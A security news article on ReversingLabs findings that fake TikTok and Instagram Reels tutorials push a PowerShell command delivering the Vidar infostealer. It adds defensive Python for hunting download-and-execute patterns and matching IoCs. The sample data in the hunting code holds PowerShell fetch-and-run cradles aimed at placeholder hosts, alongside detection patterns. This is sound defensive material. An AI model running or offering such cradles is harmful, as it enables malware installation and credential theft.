TikTok and Instagram Reels Abused to Distribute Vidarstealer Malware
Cybercriminals are exploiting TikTok and Instagram Reels with fake software tutorials to trick users into downloading the Vidarstealer infostealer, targeting credentials and financial data.

Cybercriminals are increasingly using short-form video platforms such as TikTok and Instagram Reels as a new attack surface, distributing malware through fake software tutorials. The videos are polished and convincing: they promise free access to popular premium software and quietly steer viewers toward malicious downloads. The tactic works because the videos blend in with the large volume of legitimate tech-tip and how-to content on these platforms, and view and like counts in the thousands lend them an appearance of credibility that lulls potential victims into a false sense of security.
Researchers at ReversingLabs identified two distinct campaign methods, both designed to reach large audiences by riding the platforms' recommendation algorithms. Both aim to steer users to a third-party website hosting malware disguised as a free premium application. The payload is Vidarstealer (Vidar), a well-known infostealer sold as a service that harvests login credentials, financial data, and session tokens from infected devices; stolen session tokens matter because they let an attacker reuse an already-authenticated web session without knowing the password or passing MFA. An update last October improved its evasion, making it harder to detect, and at a price of around $300 it remains a favored tool among threat actors.
The first campaign uses accounts with usernames such as "windows.tips" or "windows.insights" and a blue-and-white profile image mimicking the official Windows social media icon. These accounts post professional-looking tutorial videos with AI-generated voiceovers that instruct viewers to run a specific PowerShell command, purportedly to unlock Spotify Premium for free. The command is a download-and-execute one-liner: it silently fetches a script from a remote address and runs it, and that script ultimately delivers Vidarstealer. Because the victim pastes the command into their own PowerShell session, no software vulnerability is exploited and no file arrives as an email attachment, so attachment-focused mail controls never see it. Many of these videos have over 100,000 views and thousands of saves and shares, which adds considerably to their deceptive power.
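The defensive counterpart to the command described above is to look for the same download-and-execute shape in PowerShell activity (for example, in Script Block Logging, Event ID 4104). The following Python is an added example, not code from the ReversingLabs report or from Vidar: it scores script-block text for a remote-fetch primitive combined with an execution primitive, decodes `-EncodedCommand` payloads before matching, and treats fetch-only or stealth-flag-only blocks as lower confidence. The sample script blocks, hostnames (`example.invalid`, `198.51.100.7`) and the keyword lists are constructed assumptions for illustration, not indicators from the report.

```python
import base64
import re

# Constructed sample script-block text in the style of PowerShell Script Block
# Logging (Event ID 4104). Illustrative only; hostnames are reserved/documentation
# values and none of these lines are taken from the report.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (irm http://example.invalid/s.ps1)".encode("utf-16le")).decode()

SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents",
    "iex (irm https://example.invalid/spotify.ps1)",
    'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/x")',
    "$r = Invoke-WebRequest -Uri 'http://example.invalid/a'; Invoke-Expression $r.Content",
    f"powershell -nop -w hidden -ep bypass -enc {_ENCODED_PAYLOAD}",
    "Invoke-RestMethod -Uri https://api.example.invalid/status",
]

# Cmdlets, aliases and .NET methods that fetch remote content (assumed list).
FETCH_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget|"
    r"DownloadString|DownloadFile|DownloadData|Start-BitsTransfer)\b",
    re.IGNORECASE)
# Primitives that execute fetched text or a dropped file (assumed list).
EXEC_RE = re.compile(r"\b(Invoke-Expression|iex|Start-Process|saps)\b", re.IGNORECASE)
# Interpreter switches typical of a copy-paste one-liner that wants to run unseen.
STEALTH_RE = re.compile(
    r"(?:^|\s)-(?:nop|noprofile|w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass)\b",
    re.IGNORECASE)
# -e / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE once decoded).
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_command(text: str) -> str:
    """Return the plaintext of an -EncodedCommand argument, or '' if absent/undecodable."""
    m = ENCODED_RE.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def classify_script_block(text: str) -> dict:
    """Score one script block for the download-and-execute ('cradle') pattern.

    Returns {'verdict': 'alert' | 'suspect' | 'clean', 'reasons': [...], 'decoded': str}.
    Matching runs over the raw text plus any decoded -EncodedCommand payload.
    """
    decoded = decode_encoded_command(text)
    haystack = text + "\n" + decoded
    reasons = []
    fetch = FETCH_RE.search(haystack)
    execp = EXEC_RE.search(haystack)
    stealth = [s.strip() for s in STEALTH_RE.findall(text)]
    if decoded:
        reasons.append("encoded command decoded: " + decoded.strip())
    if fetch:
        reasons.append("remote fetch via " + fetch.group(1))
    if execp:
        reasons.append("execution via " + execp.group(1))
    if stealth:
        reasons.append("stealth flags: " + ", ".join(stealth))
    if fetch and execp:
        verdict = "alert"      # fetch and execute in one block: the cradle shape
    elif fetch and (stealth or decoded):
        verdict = "suspect"    # fetch plus hiding/obfuscation, no visible execute
    else:
        verdict = "clean"      # ordinary admin activity, or a fetch with no execute
    return {"verdict": verdict, "reasons": reasons, "decoded": decoded}


def hunt(blocks):
    """Return [(verdict, block)] for every block that is not clean."""
    hits = []
    for block in blocks:
        result = classify_script_block(block)
        if result["verdict"] != "clean":
            hits.append((result["verdict"], block))
    return hits


if __name__ == "__main__":
    for verdict, block in hunt(SAMPLE_SCRIPT_BLOCKS):
        print(verdict.upper(), block[:80])
```

The fetch-only line (`Invoke-RestMethod` against an API) is deliberately left clean: a hunt that alerts on every web request from PowerShell drowns in administrative noise, whereas fetch plus execute in a single block is rare outside of attacks and software installers you can allow-list.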
The second campaign takes a more casual approach. These accounts post short, engaging clips that show off premium Spotify features over trending music, prompting curious viewers to ask in the comments how it was done. Once a viewer engages, the attacker replies with links to malicious sites such as pluginchad[.]xyz or d4ug[.]site. These sites host fake software downloads, often hidden behind survey walls, to further obscure the malicious intent.
Social media platforms are struggling to keep up with this threat. ReversingLabs researchers reported malicious Instagram accounts as scams, only to have the reports rejected. Even when content is flagged, intervention is often slow, leaving accounts active long enough to do considerable damage before they are removed. Attackers also suppress community warnings by deleting critical comments and blocking users who try to alert others, so self-policing by users is nearly impossible.
This dynamic places the burden of defense on organizations and individual users. Practical measures include regularly auditing which software users are permitted to install on work devices, since some of the promoted software is framed as professional tooling, and updating phishing-awareness training to cover social media explicitly as a primary attack vector rather than email alone. Technical controls that catch this chain regardless of the lure are PowerShell Script Block Logging and alerting on download-and-execute patterns in it, because the infection only proceeds if the pasted command runs. Users should also keep reporting suspicious accounts: higher report volumes raise the likelihood of removal and disrupt an attacker's momentum.
Indicators of Compromise (IoCs) from the report: the SHA-256 hash 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153 for build.exe (identified as Vidarstealer); the domains pluginchad[.]xyz and d4ug[.]site (shown defanged, so the brackets must be removed before matching them against logs); and the TikTok and Instagram account handles used in the campaigns.
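The hash and domains above are the parts of the IoC list that can be checked mechanically. The following Python is an added example, not tooling from the ReversingLabs report: it refangs the published domains, matches DNS queries against them including subdomains (while not matching look-alike names that merely start with the same string), and checks EDR-style process records for the published SHA-256. The DNS log lines, process records, host names and client addresses are constructed for the example and not from the report.

```python
import hashlib
import re
from typing import Optional

# IoCs as published in the report, kept in their defanged form here.
REPORT_IOCS = {
    "sha256": {"03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153"},
    "domains": {"pluginchad[.]xyz", "d4ug[.]site"},
}

# Constructed DNS query log: "<timestamp> <client> <type> <qname>" per line.
# The final line is a deliberate near-miss to show subdomain matching is exact.
DNS_LOG = """\
2024-05-02T10:01:13Z 10.0.0.21 A open.spotify.com
2024-05-02T10:01:40Z 10.0.0.21 A pluginchad.xyz
2024-05-02T10:02:05Z 10.0.0.33 A cdn.d4ug.site
2024-05-02T10:02:30Z 10.0.0.33 A d4ug.sitemap.example.com
"""

# Constructed process-creation records in the shape an EDR or Sysmon export might give.
PROCESS_EVENTS = [
    {"host": "WS-0412", "image": r"C:\Users\alice\AppData\Local\Temp\build.exe",
     "sha256": "03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153"},
    {"host": "WS-0413", "image": r"C:\Windows\System32\notepad.exe",
     "sha256": hashlib.sha256(b"constructed benign sample").hexdigest()},
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator into a matchable one: 'a[.]b' -> 'a.b', 'hxxp' -> 'http'."""
    cleaned = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", indicator.strip().lower())
    return cleaned.replace("hxxp", "http")


def domain_matches(query: str, ioc_domains) -> Optional[str]:
    """Return the IoC domain that `query` equals or is a subdomain of, else None."""
    q = refang(query).rstrip(".")
    for raw in ioc_domains:
        d = refang(raw)
        if q == d or q.endswith("." + d):
            return d
    return None


def scan_dns_log(log_text: str, ioc_domains):
    """Return (client, qname, matched_ioc) for each query that hits an IoC domain."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than failing the whole scan
        _ts, client, _rtype, qname = parts
        matched = domain_matches(qname, ioc_domains)
        if matched:
            hits.append((client, qname, matched))
    return hits


def scan_process_events(events, ioc_hashes):
    """Return the process records whose SHA-256 is in the IoC set (case-insensitive)."""
    wanted = {h.lower() for h in ioc_hashes}
    return [e for e in events if e.get("sha256", "").lower() in wanted]


def hash_file(path: str, chunk_size: int = 1 << 20) -> str:
    """SHA-256 of a file on disk, read in chunks so large binaries do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


if __name__ == "__main__":
    for client, qname, ioc in scan_dns_log(DNS_LOG, REPORT_IOCS["domains"]):
        print(f"DNS hit: {client} queried {qname} (IoC {ioc})")
    for ev in scan_process_events(PROCESS_EVENTS, REPORT_IOCS["sha256"]):
        print(f"Hash hit: {ev['host']} ran {ev['image']}")
```

Matching on `endswith("." + d)` rather than a plain substring is what keeps `d4ug.sitemap.example.com` from firing on `d4ug[.]site`; a hash match is exact, so a recompiled build of the same stealer will not be caught by it and the DNS and PowerShell behaviour checks remain the more durable signal.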
In summary, ReversingLabs' analysis details two distinct campaigns running on TikTok and Instagram Reels. One mimicked official Windows accounts and used AI-generated voiceovers to push a PowerShell command that downloaded Vidar; the other used less polished clips and comment baiting to steer users to survey-laden download sites. The report also notes that platform moderation has been largely ineffective, citing rejected abuse reports and the creators' ability to delete critical comments.